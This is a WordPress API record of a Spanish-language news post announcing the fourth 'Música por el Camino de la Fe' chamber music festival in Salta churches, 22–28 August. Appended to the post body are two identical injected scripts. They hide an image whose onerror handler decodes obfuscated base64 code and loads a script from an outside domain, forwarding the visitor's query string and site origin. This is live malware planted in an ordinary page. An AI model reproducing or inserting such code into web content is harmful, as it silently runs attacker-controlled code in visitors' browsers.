{"id":1323,"date":"2022-08-18T23:44:40","date_gmt":"2022-08-19T02:44:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1323"},"modified":"2025-08-14T00:38:09","modified_gmt":"2025-08-14T03:38:09","slug":"la-ciudad-vivira-la-4ta-edicion-del-festival-musica-por-el-camino-de-la-fe","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1323","title":{"rendered":"La ciudad vivir\u00e1 la 4ta edici\u00f3n del festival \u00abM\u00fasica por el Camino de la Fe\u00bb"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#ad022d\"><strong>Se llevar\u00e1 a cabo entre el 22 y el 28 de agosto con la participaci\u00f3n de destacados artistas. Este ciclo de m\u00fasica cl\u00e1sica, vocal e instrumental es organizado por el municipio. Entrada libre y gratuita.<\/strong><\/h4>\n\n\n\n<p>La Municipalidad de la ciudad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, presenta la 4ta edici\u00f3n de M\u00fasica por el Camino de la Fe, un festival de m\u00fasica cl\u00e1sica, vocal e instrumental que se llevar\u00e1 a cabo del 22 al 28 de agosto&nbsp; y contar\u00e1 con la participaci\u00f3n de destacados artistas.<\/p>\n\n\n\n<p>Las locaciones este a\u00f1o integrar\u00e1n parroquias barriales de nuestra ciudad que se sumar\u00e1n a la Iglesia de la Merced,&nbsp; la parroquia Nuestra Se\u00f1ora del Valle- Le\u00f3n XII, la Iglesia San Jos\u00e9 y la Bas\u00edlica Menor San Francisco, que ser\u00e1n los escenarios&nbsp; para las obras de c\u00e1mara. La entrada ser\u00e1 libre y gratuita.<\/p>\n\n\n\n<p>As\u00ed, en el marco del festival, los vecinos podr\u00e1n disfrutar de las presentaciones de la Camerata Stradivari, Il Flautario,&nbsp; Jard\u00edn de Apolo, Antiqua Camera, la Camerata UCASAL y como invitados, desde la provincia de Mendoza, se presentar\u00e1 Vientos del Plata y desde Rosario de Santa Fe, Ensamble Fulmini.&nbsp;<\/p>\n\n\n\n<p><strong>El programa<\/strong><\/p>\n\n\n\n<p>Bajo la direcci\u00f3n art\u00edstica del maestro Jorge Lhez, el programa comenzar\u00e1 todos los d\u00edas a las 21 horas&nbsp; y ser\u00e1 el siguiente:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Lunes 22 de agosto se presentar\u00e1 la Camerata Stradivari, en la parroquia Virgen de la Medalla Milagrosa \u2013 Av del Bicentenario 1600.<\/li><li>Martes 23 de agosto, actuar\u00e1 Jard\u00edn de Apolo en la parroquia del Se\u00f1or y Virgen del Milagro \u2013 Av. Batalla de Salta 483. Barrio Ciudad del Milagro.<\/li><li>Mi\u00e9rcoles 24 de agosto, se presentar\u00e1&nbsp; Il Flautario, en la parroquia Encarnaci\u00f3n del Verbo \u2013 Av. Ivonne de Retamoso de I\u00f1iguez 5408. Barrio Limache.<\/li><li>Jueves 25 de agosto, ser\u00e1 el turno de la Camerata UCASAL,en la&nbsp; parroquia Nuestra Se\u00f1ora del Valle- Le\u00f3n XII. Mendoza 315.<\/li><li>Viernes 26 de agosto actuar\u00e1 Antiqua Camera Vocal e Instrumental en la Parroquia San Juan Bautista de la Merced. Caseros 857.<\/li><li>S\u00e1bado 27 de agosto, llega desde Mendoza, Vientos del Plata, que actuar\u00e1n en la Iglesia San Jos\u00e9. Urquiza 457.<\/li><li>Domingo 28 de agosto desde Rosario de Santa Fe, arriba&nbsp; Ensamble Fulmini para realizar el cierre en la Iglesia San Francisco. C\u00f3rdoba 33.<\/li><\/ul>\n\n\n\n<p>\u00abEste proyecto va en camino a ser referente de m\u00fasica de c\u00e1mara por su excelencia art\u00edstica y porque convoca a los principales referentes de m\u00fasica local, nacional e internacional. Debemos destacar que el p\u00fablico ya tiene conocimiento de este ciclo y\u00a0 espera las fechas para disfrutarlo. Este a\u00f1o estaremos tambi\u00e9n en las\u00a0 parroquias de algunos barrios lo que nos permite un acercamiento distinto e integral\u201d, comparti\u00f3, Jorge Lhez, director art\u00edstico del festival.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"1324\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/whatsapp-image-2021-12-13-at-085008-1-1024x576-1.jpeg\" alt=\"\" class=\"wp-image-1324\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/whatsapp-image-2021-12-13-at-085008-1-1024x576-1.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/whatsapp-image-2021-12-13-at-085008-1-1024x576-1-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/whatsapp-image-2021-12-13-at-085008-1-1024x576-1-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/whatsapp-image-2021-12-13-at-085008-1-1024x576-1-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/whatsapp-image-2021-12-13-at-085008-1-1024x576-1-747x420.jpeg 747w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"961\" height=\"714\" data-id=\"1326\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2.png\" alt=\"\" class=\"wp-image-1326\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2.png 961w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-300x223.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-768x571.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-485x360.png 485w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-696x517.png 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-565x420.png 565w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-80x60.png 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-2-265x198.png 265w\" sizes=\"(max-width: 961px) 100vw, 961px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"713\" data-id=\"1325\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-1024x713.jpeg\" alt=\"\" class=\"wp-image-1325\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-1024x713.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-300x209.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-768x535.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-696x484.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-1068x743.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-603x420.jpeg 603w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe-100x70.jpeg 100w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/musica-fe.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se llevar\u00e1 a cabo entre el 22 y el 28 de agosto con la participaci\u00f3n de destacados artistas. Este ciclo de m\u00fasica cl\u00e1sica, vocal e instrumental es organizado por el municipio. Entrada libre y gratuita. La Municipalidad de la ciudad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, presenta la 4ta edici\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1326,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[2],"tags":[],"class_list":{"0":"post-1323","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-religiosos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1323"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1323"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1323\/revisions"}],"predecessor-version":[{"id":7389,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1323\/revisions\/7389"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1326"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1323"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1323"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}